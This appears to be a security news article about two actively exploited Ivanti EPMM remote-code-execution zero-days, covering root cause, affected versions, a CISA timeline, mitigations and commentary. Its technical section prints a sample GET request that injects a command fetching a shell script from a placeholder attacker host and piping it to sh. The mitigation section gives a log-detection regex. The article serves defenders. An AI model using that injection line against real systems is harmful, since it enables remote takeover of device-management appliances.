~/home/news/critical-ivanti-epmm-zero-day-2026-02-02
newsMonday, February 2, 20268 min read👁 13 views

Critical Ivanti EPMM Zero-Day RCE Flaws (CVE-2026-1281 & CVE-2026-1340) Actively Exploited

Ivanti disclosed two critical, unauthenticated remote-code-execution zero-days in Endpoint Manager Mobile (EPMM). Both CVEs are in CISA’s KEV catalog and are being exploited in the wild, prompting emergency patches and urgent remediation.

IvantiEndpoint Manager MobileZero-DayCritical Vulnerability

Overview/Introduction

On January 29, 2026 Ivanti announced two new critical vulnerabilities in its mobile device management solution, Ivanti Endpoint Manager Mobile (EPMM). The flaws—identified as CVE-2026-1281 and CVE-2026-1340—allow an unauthenticated attacker to inject arbitrary Bash commands via crafted HTTP GET requests. Within days, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2026-1281 to its Known Exploited Vulnerabilities (KEV) catalog and set a Feb 1, 2026 remediation deadline for federal agencies.

Both vulnerabilities have been confirmed in active wild‑exploitation campaigns, and a public proof‑of‑concept (PoC) was released on January 30, 2026. Ivanti responded with emergency RPM patches for all affected versions and announced a permanent fix in the upcoming 12.8.0.0 release.

Technical Details

Each CVE scores 9.8 (Critical) on the CVSS v3.1 scale and falls under CWE-94: Improper Control of Generation of Code. The root cause is insufficient sanitisation of user‑supplied input in two EPMM web‑service endpoints:

  • /mifs/c/appstore/fob/ – the “In‑House Application Distribution” feature.
  • /mifs/c/aftstore/fob/ – the “Android File Transfer Configuration” feature.

Attackers embed Bash commands directly into the query string of an HTTP GET request. The vulnerable code concatenates this string into a shell command without proper escaping, resulting in immediate execution on the underlying appliance. Because the service is exposed on the management network and does not require authentication, the attack vector is purely network‑based.

A typical exploit looks like:

GET /mifs/c/appstore/fob/?cmd=;curl%20http://attacker.com/shell.sh|sh HTTP/1.1
Host: victim-epmm.example.com

Successful exploitation grants the attacker system‑level privileges on the EPMM appliance, enabling:

  • Extraction of PII (names, emails, phone numbers, GPS data) stored in the MDM database.
  • Deployment of web‑shells or reverse shells for persistent access.
  • Lateral movement to other devices managed by the compromised appliance.

Impact Analysis

The affected product line is limited to Ivanti Endpoint Manager Mobile (EPMM) 12.5.0.0, 12.6.0.0, 12.7.0.0 and their incremental releases (12.5.1.0, 12.6.1.0). Organizations that rely on EPMM for mobile device enrollment, app distribution, and configuration—spanning federal agencies, large enterprises, and managed service providers—are at risk.

Impact categories include:

  • Confidentiality: Direct access to device‑level data (IMEI, GPS, contact lists) and user credentials.
  • Integrity: Ability to push malicious applications or alter device policies.
  • Availability: Potential for ransomware or destructive commands that shut down the MDM service.

Given the privileged nature of the EPMM appliance within an enterprise network, compromise can serve as a foothold for broader attacks, making the overall risk profile “critical.”

Timeline of Events

  • Jan 29, 2026 – Ivanti publicly discloses CVE-2026-1281 and CVE-2026-1340.
  • Jan 30, 2026 – Rapid7 and The Hacker News report active exploitation; public PoC released.
  • Jan 31, 2026 – CISA adds CVE-2026-1281 to KEV catalog and sets a Feb 1 remediation deadline for federal entities.
  • Feb 1, 2026 – Deadline for agencies to patch or remove vulnerable EPMM devices from networks.
  • Feb 2, 2026 – Ivanti issues emergency RPM patches for affected versions (12.x.0.x and 12.x.1.x).
  • Q1 2026 (later) – Permanent fix scheduled in EPMM 12.8.0.0.

Mitigation/Recommendations

Immediate actions for any organisation running EPMM:

  1. Apply the emergency RPM patches. The patches are version‑specific (12.x.0.x and 12.x.1.x) and must be re‑applied after any appliance upgrade.
  2. Block the vulnerable endpoints at the network perimeter. Create firewall rules to deny inbound traffic to /mifs/c/appstore/fob/ and /mifs/c/aftstore/fob/ from untrusted networks.
  3. Monitor Apache access logs. Look for the following regex pattern to detect exploitation attempts: 
    ^(?!127\.0\.0\.1:\d+).*?\/mifs\/c\/(aft|app)store\/fob\/.*?404
    Successful legitimate calls return 200, while suspicious attempts often result in 404 or 500 responses.
  4. Enable IDS/IPS signatures. Most major vendors have released Snort/Suricata rules targeting the malicious query strings observed in the public PoC.
  5. Consider disabling the “In‑House Application Distribution” and “Android File Transfer Configuration” features if they are not actively used.
  6. Perform a forensic review. Search for newly created web‑shells, reverse‑shell binaries, or unusual scheduled tasks on the appliance.
  7. Plan migration to the upcoming 12.8.0.0 release. The permanent fix will be baked into that version, eliminating the need for post‑upgrade patch re‑application.

Real-World Impact

Enterprises that have deployed EPMM to manage thousands of employee smartphones are suddenly exposed to a “kill‑chain” that begins with a single unauthenticated HTTP request. In practice, an attacker could:

  • Harvest employee location data and contact lists, facilitating spear‑phishing or credential‑stuffing attacks.
  • Push a malicious corporate app that exfiltrates data or establishes a persistent backdoor on every enrolled device.
  • Leverage the appliance’s privileged network access to pivot onto internal services (e.g., VPN concentrators, file servers).

For government agencies, the CISA deadline underscores the potential national‑security ramifications. Failure to remediate could force agencies to de‑commission EPMM appliances, disrupting mobile‑first initiatives and incurring significant operational costs.

Expert Opinion

From a strategic perspective, the rapid emergence of two independent zero‑days in the same product line signals a deeper issue in Ivanti’s secure‑development lifecycle. The fact that both flaws stem from the same underlying input‑validation weakness suggests that the codebase for the web‑service layer has not been fully hardened against command injection.

For the broader industry, this incident reinforces three key takeaways:

  1. Zero‑Day Velocity Is Rising. Mobile device management platforms are increasingly attractive targets because they sit at the intersection of corporate data and user devices. Vendors must adopt “bug‑bounty‑first” programs and continuous static analysis to surface such defects before release.
  2. Patch‑Management Speed Is Critical. The three‑day CISA remediation window is a stark reminder that traditional patch‑testing cycles can leave organisations exposed. Automated, staged roll‑outs and “emergency patch windows” should become a standard part of MDM governance.
  3. Defense‑in‑Depth Must Include Application‑Layer Controls. Relying solely on network segmentation is insufficient when an appliance exposes unauthenticated HTTP endpoints. Deploying a Web Application Firewall (WAF) with strict request‑validation rules can buy valuable time before patches are applied.

In short, organizations running Ivanti EPMM must treat these vulnerabilities as a top‑priority emergency, apply the patches immediately, and re‑evaluate their overall MDM security posture to prevent future supply‑chain‑style compromises.